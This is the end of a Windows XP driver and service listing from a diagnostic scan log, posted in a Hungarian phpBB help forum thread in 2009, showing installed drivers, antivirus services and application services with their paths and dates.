R1 epfwtdir;epfwtdir; C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-10-24 34824]
R1 InCDPass;InCDPass; C:\WINDOWS\System32\DRIVERS\InCDPass.sys [2004-02-10 27408]
R1 intelppm;Intel processzor illesztőprogramja; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 40576]
R1 kbdhid;Billentyűzet HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14720]
R1 vmm;Virtual Machine Monitor; \??\C:\WINDOWS\system32\Drivers\vmm.sys []
R1 vsdatant;vsdatant; C:\WINDOWS\System32\vsdatant.sys [2008-08-21 353680]
R2 DLPortIO;DriverLINX Port I/O Driver; \??\C:\WINDOWS\system32\DRIVERS\DLPortIO.SYS []
R2 eamon;EAMON; C:\WINDOWS\system32\DRIVERS\eamon.sys [2008-10-24 39944]
R2 TVicPort;TVICPORT; \??\C:\WINDOWS\system32\DRIVERS\TVICPORT.SYS []
R3 ASAPIW2k;ASAPIW2K; C:\WINDOWS\system32\drivers\ASAPIW2k.sys [2005-05-26 11264]
R3 BthEnum;Bluetooth kérési blokk illesztőprogramja; C:\WINDOWS\system32\DRIVERS\BthEnum.sys [2008-04-13 17024]
R3 BthPan;Bluetooth Device (Personal Area Network); C:\WINDOWS\system32\DRIVERS\bthpan.sys [2008-04-13 101120]
R3 BTHUSB;Bluetooth-rádió USB illesztőprogramja; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2008-04-13 18944]
R3 DCamUSBEMPIA;PCTV USB2 2821 Capture; C:\WINDOWS\system32\DRIVERS\emDevice.sys [2004-04-06 100957]
R3 emAudio;PCTV USB2 2821 Audio; C:\WINDOWS\system32\drivers\emAudio.sys [2004-05-05 19584]
R3 FETND5BV;VIA Rhine-Family Fast Ethernet Adapter Driver Service; C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2005-11-16 42496]
R3 FiltUSBEMPIA;USB Device Lower Filter; C:\WINDOWS\system32\DRIVERS\emFilter.sys [2004-04-06 5245]
R3 HDAudBus;Microsoft UAA busz-illesztőprogram - High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 hidusb;Microsoft HID osztályú illesztőprogram; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2006-06-28 4304384]
R3 LVUSBSta;Logitech USB Monitor Filter; C:\WINDOWS\system32\drivers\lvusbsta.sys [2005-01-31 22016]
R3 mouhid;Egér HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-18 12160]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-12-03 6209536]
R3 pepifilter;Volume Adapter; C:\WINDOWS\system32\DRIVERS\lv302af.sys [2005-01-31 7104]
R3 PID_08A0;QuickCam IM(PID_08A0); C:\WINDOWS\system32\DRIVERS\LV302AV.SYS [2005-01-31 912768]
R3 RFCOMM;Bluetooth-eszköz (RFCOMM protokoll TDI); C:\WINDOWS\system32\DRIVERS\rfcomm.sys [2008-04-13 59136]
R3 ScanUSBEMPIA;USB Still Image Capture Device; C:\WINDOWS\system32\DRIVERS\emScan.sys [2004-04-06 4493]
R3 SNXPCARD;Sunix PCI Multi I/O Card Driver; C:\WINDOWS\system32\DRIVERS\snxpcard.sys [2003-04-03 20864]
R3 SNXPPALX;Sunix PCI Parallel Port Driver; C:\WINDOWS\system32\DRIVERS\snxppalx.sys [2003-04-07 75264]
R3 StillCam;Still Serial digitális fényképezőgép illesztőprogramja; C:\WINDOWS\system32\DRIVERS\serscan.sys [2001-10-26 6912]
R3 usbaudio;USB audio-illesztőprogram (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
R3 usbccgp;Microsoft USB általános szülő-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
R3 usbehci;Microsoft USB 2.0 bővített állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Microsoft USB szabványos hub-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbstor;USB háttértár illesztőprogramja; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
R3 usbuhci;Microsoft USB univerzális állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
R3 VPCNetS2;Virtual Machine Network Services Driver; C:\WINDOWS\system32\DRIVERS\VMNetSrv.sys [2007-01-29 59280]
R4 InCDfs;InCD File System; C:\WINDOWS\system32\drivers\InCDfs.sys [2004-02-10 94320]
S3 alvoxvg6;alvoxvg6; C:\WINDOWS\system32\drivers\alvoxvg6.sys []
S3 Arp1394;1394 ARP ügyfélprotokoll; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
S3 BTHMODEM;Bluetooth-modem kommunikációs illesztőprogramja; C:\WINDOWS\system32\DRIVERS\bthmodem.sys [2008-04-13 37888]
S3 BTHPORT;Bluetooth-portillesztőprogram; C:\WINDOWS\System32\Drivers\BTHport.sys [2008-04-14 273408]
S3 CCDECODE;Feliratdekódoló; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
S3 FETNDIS;VIA PCI 10/100Mb Fast Ethernet adapter NT-illesztőprogramja; C:\WINDOWS\system32\DRIVERS\fetnd5.sys [2001-08-17 27165]
S3 ggflt;SEMC USB Flash Driver Filter; C:\WINDOWS\system32\DRIVERS\ggflt.sys [2009-03-01 13224]
S3 ggsemc;SEMC USB Flash Driver; C:\WINDOWS\system32\DRIVERS\ggsemc.sys [2009-03-01 24616]
S3 GT72NDISIPXP;GT 72 IP NDIS; C:\WINDOWS\system32\DRIVERS\Gt51Ip.sys [2007-07-09 95744]
S3 GT72UBUS;GT 72 U BUS; C:\WINDOWS\system32\DRIVERS\gt72ubus.sys [2007-06-26 51968]
S3 GTPTSER;GT PT SER; C:\WINDOWS\system32\DRIVERS\gtptser.sys [2007-03-30 8064]
S3 HidBth;Microsoft Bluetooth HID miniport; C:\WINDOWS\system32\DRIVERS\hidbth.sys [2008-04-14 25728]
S3 MSTEE;Microsoft Streaming Tee/Sink - Sink átalakító; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
S3 NABTSFEC;NABTS/FEC VBI kodek; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
S3 NdisIP;Microsoft TV-/videokapcsolat; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
S3 NIC1394;1394 hálózati illesztőprogram; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
S3 se45bus;Sony Ericsson Device 069 driver (WDM); C:\WINDOWS\system32\DRIVERS\se45bus.sys [2006-11-30 61536]
S3 Ser2pl;Prolific Serial port driver; C:\WINDOWS\system32\DRIVERS\ser2pl.sys [2003-07-16 43264]
S3 SIS163u;SiS163 usb Wireless LAN Adapter Driver; C:\WINDOWS\system32\DRIVERS\sis163u.sys [2005-06-20 215040]
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
S3 usbprint;Microsoft USB PRINTER osztály; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 Wdf01000;Kernel Mode Driver Frameworks service; C:\WINDOWS\System32\Drivers\wdf01000.sys [2008-03-27 503008]
S3 WSTCODEC;World Standard Teletext kodek; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-28 82944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 BthServ;Bluetooth Support Service; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
R2 ekrn;Eset Service; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2008-10-24 468224]
R2 GtDetectSc;GtDetectSc; C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe [2007-11-05 204915]
R2 InCDsrv;InCD Helper; C:\Program Files\Ahead\InCD\InCDsrv.exe [2004-02-10 847978]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-01-13 152984]
R2 KeyFocusWebServer;KF Web Server; C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe [2002-06-15 745472]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-12-03 163908]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2006-03-03 69632]
R2 PnkBstrA;PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [2009-02-08 66872]
R2 TestHandler;Fujitsu Siemens Computers Diagnostic Testhandler; C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe [2008-04-25 303104]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R2 vsmon;TrueVector Internet Monitor; C:\WINDOWS\system32\ZoneLabs\vsmon.exe [2008-08-21 2405776]
R3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; c:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
R3 usnjsvc;Messenger megosztási mappák – USN-naplóolvasó szolgáltatás; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2005-09-23 29896]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2005-09-23 66240]
S3 EhttpSrv;Eset HTTP Server; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [2008-10-24 19200]
S3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-05-19 655624]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
S3 MSCSPTISRV;MSCSPTISRV; C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe [2006-12-14 45056]
S3 MSSQL$PINNACLESYS;MSSQL$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe [2005-05-04 9150464]
S3 MSSQLServerADHelper;MSSQLServerADHelper; C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe [2005-05-03 73728]
S3 PACSPTISVR;PACSPTISVR; C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe [2006-12-14 57344]
S3 PinnacleSys.MediaServer;Pinnacle Systems Media Service; C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe [2006-01-19 49152]
S3 SerialKeys;SerialKeys; C:\WINDOWS\system32\skeys.exe [2008-04-14 26112]
S3 SonicStage Back-End Service;SonicStage Back-End Service; C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe [2007-02-05 112184]
S3 SPTISRV;Sony SPTI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe [2006-12-14 69632]
S3 SQLAgent$PINNACLESYS;SQLAgent$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlagent.EXE [2005-05-03 323584]
S3 SSScsiSV;SonicStage SCSI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe [2007-02-05 75320]
S3 WLSetupSvc;Windows Live Setup Service; C:\Program Files\Windows Live\installer\WLSetupSvc.exe [2007-10-25 266240]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]

-----------------EOF-----------------


szomb. máj. 23, 2009 13:05
Profil Privát üzenet küldése
Hozzászólások megjelenítése:  Rendezés  
A témát lezárták, nem szerkesztheted a hozzászólásaid, és nem küldhetsz új hozzászólást.   [ 2493 hozzászólás ]  Oldal Előző  1 ... 13, 14, 15, 16, 17, 18, 19 ... 50  Következő

Ki van itt

Jelenlévő fórumozók: nincs regisztrált felhasználó valamint 6 vendég


Nem nyithatsz témákat ebben a fórumban.
Nem válaszolhatsz egy témára ebben a fórumban.
Nem szerkesztheted a hozzászólásaidat ebben a fórumban.
Nem törölheted a hozzászólásaidat ebben a fórumban.

Keresés:
Ugrás:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Designed by ST Software for PTF.
Magyar fordítás © Magyar phpBB Közösség